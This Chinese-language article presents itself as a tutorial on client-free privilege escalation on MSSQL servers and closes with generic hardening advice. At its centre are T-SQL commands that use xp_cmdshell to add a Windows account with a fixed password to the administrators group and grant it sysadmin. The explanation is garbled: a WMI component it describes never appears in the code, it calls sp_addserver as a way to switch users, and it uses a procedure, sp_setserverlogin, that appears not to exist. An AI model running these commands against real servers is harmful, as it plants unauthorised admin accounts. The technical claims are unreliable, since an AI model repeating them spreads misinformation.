MSSQL提权破解：无需客户端的简易上传方法（mssql上传提权）

MSSQL提权破解是一种重要的安全攻击，它能够让攻击者在MSSQL服务器上获得比自身账户权限更高的控制权。

大多数MSSQL提权技术需要经典的客户端上传，才能获得控制权限。它们在攻击过程中使用傻瓜、Utilman、Cmd脚本在服务器端运行。但它们面临一定的技术限制。

为了解决上传到服务器端的客户端权限问题，今天我们介绍一种无需客户端的简易MSSQL提权方法，它可以有效地解决这类问题。

该方法使用一个可以调用WMI的mssqlxp组件来进行提权操作，所以它可以免去客户端上传的麻烦。它的原理如下：向内存体系结构中写入一个“系统账户”用户，并将其赋予管理员权限。然后，将任意用户从它的现有角色（例如：db_datareader）升级到sysadmin，并在服务器中切换到sysadmin账户，以获得管理权限。

以下是用来实现该方法的代码：

–Create a new account with sysadmin role

EXEC xp_cmdshell ‘net user login_name “p@ssw0rd” /add’;

EXEC xp_cmdshell ‘net localgroup administrators login_name /add’;

— Grant the sysadmin privileges to the given user

EXEC sp_addsrvrolemember ‘login_name’, ‘sysadmin’;

— Switch the server to the target user

EXEC sp_addserver login_name, local;

EXEC sp_setserverlogin login_name;

这种简易上传方法的优势在于无需进行客户端的上传操作，就可以实现MSSQL提权攻击，其中已经有使用WMI脚本实现。因此，它不仅可以提供更多更便捷的提权攻击方式，而且还可以有效避免客户端权限相关的问题。

为了保护MSSQL服务器，建议采取有效的安全措施，如定期更改系统密码，禁止使用默认用户名和密码，实施安全访问控制，以及安装可信任软件防护以及可检测恶意操作等安全措施。这些安全措施既可以防止攻击者进行MSSQL提权，也可以有效保护MSSQL服务器的安全。